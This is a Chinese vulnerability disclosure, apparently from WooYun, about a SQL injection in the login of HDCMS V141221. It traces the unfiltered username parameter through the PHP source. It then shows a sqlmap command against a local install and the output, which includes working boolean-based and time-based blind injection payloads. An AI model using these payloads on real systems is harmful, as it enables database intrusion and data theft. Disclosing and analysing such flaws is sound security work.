乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-27: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-04-27: 厂商已经主动忽略漏洞,细节向公众公开
HDCMS内容管理系统V141221存在POST注入
漏洞在登录处,看下登录方法LoginController.class.php
//会员登录 public function login() { if (IS_POST) { if ($this->db->userLogin()) { if (cookie('HISTORY')) go(cookie('HISTORY')); else go(U('Member/Index/index')); } else { $this->error($this->db->error); } } else { $this->display(); } }
跟踪userLogin到LoginModel.class.php
//会员登录 public function userLogin() { if (!$username = Q('post.username')) { $this->error = '帐号不能为空'; return false; } if (!$password = Q('post.password')) { $this->error = '密码不能为空'; return false; } if (!$user = M("user")->join("__user__ u JOIN __role__ r ON u.rid=r.rid")->find("username='{$username}'")) { $this->error = '帐号不存在'; return false; } if (md5($password . $user['code']) != $user['password']) { $this->error = '密码错误'; return false; } /** * 修改登录IP */ $data['uid']=$user['uid']; $data['lastip']=ip_get_client(); M('user')->save($data); unset($user['password']); unset($user['code']); //头像 if (empty($user['icon']) || !is_file($user['icon'])) { $user['icon'] = __STATIC__ . '/image/user.png'; } else { $user['icon'] = __ROOT__ . '/' . $user['icon']; } $user['web_master'] = strtolower($user['username']) == strtolower(C('WEB_MASTER'));; $_SESSION['user'] = $user; return true; }}
重要的是这句
if (!$user = M("user")->join("__user__ u JOIN __role__ r ON u.rid=r.rid")->find("username='{$username}'")) { $this->error = '帐号不存在'; return false;
$username无过滤,Function.php
function Q($var, $default = null, $filter = null){ //拆分,支持get.id 或 id $var = explode(".", $var); if (count($var) == 1) { array_unshift($var, 'request'); } $var[0] = strtolower($var[0]); //获得数据并执行相应的安全处理 switch (strtolower($var[0])) { case 'get' : $data = &$_GET; break; case 'post' : $data = &$_POST; break; case 'request' : $data = &$_REQUEST; break; case 'files' : $data = &$_FILES; break; case 'session' : $data = &$_SESSION; break; case 'cookie' : $data = &$_COOKIE; break; case 'server' : $data = &$_SERVER; break; case 'globals' : $data = &$GLOBALS; break; default : throw_exception($var[0] . 'Q方法参数错误'); } //没有执行参数如q("post.")时返回所有数据 if (empty($var[1])) { return $data; //如果存在数据如$this->_get("page"),$_GET中存在page数据 } else if (isset($data[$var[1]])) { //要获得参数如$this->_get("page")中的page $value = $data[$var[1]]; //对参数进行过滤的函数 $funcArr = is_null($filter) ? C("FILTER_FUNCTION") : $filter; //参数过滤函数 if (is_string($funcArr) && !empty($funcArr)) { $funcArr = explode(",", $funcArr); } //是否存在过滤函数 if (!empty($funcArr) && is_array($funcArr)) { //对数据进行过滤处理 foreach ($funcArr as $func) { if (!function_exists($func)) continue; $value = is_array($value) ? array_map($func, $value) : $func($value); } $data[$var[1]] = $value; return $value; } return $value; } else { $data[$var[1]] = $default; return $default; }}
跟踪find方法,Model.class.php
public function select($where = '') { $this->trigger && method_exists($this, '__before_select') && $this->__before_select(); $return = $this->db->select($where); $this->trigger && method_exists($this, '__after_select') && $this->__after_select($return); /** * 重置模型 */ $this->__reset(); return $return; }
$db调用Db.class.php中的select方法
public function select($where = '') { /** * 有查询条件时 */ $this->where($where); /** * 组合查询SQL */ $sql = 'SELECT ' . $this->opt['field'] . ' FROM ' . $this->opt['table'] . $this->opt['where'] . $this->opt['group'] . $this->opt['having'] . $this->opt['order'] . $this->opt['limit']; return $this->query($sql); }
跑下数据
sqlmap.py -u"http://127.0.0.1/hdcms/index.php?m=Member&c=Login&a=login" --data "username=tsplay&password=tsplay" -p username --batch --dbs
结果
POST parameter 'username' is vulnerable. Do you want to keep testing the others(if any)? [y/N] Nsqlmap identified the following injection points with a total of 207 HTTP(s) requests:---Parameter: username (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: username=tsplay' AND 8396=8396 AND 'IYjy'='IYjy&password=tsplay Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: username=tsplay' AND SLEEP(5) AND 'STUA'='STUA&password=tsplay---[18:24:08] [INFO] the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: Apache 2.2.21, PHP 5.3.10back-end DBMS: MySQL 5.0.11
未能联系到厂商或者厂商积极拒绝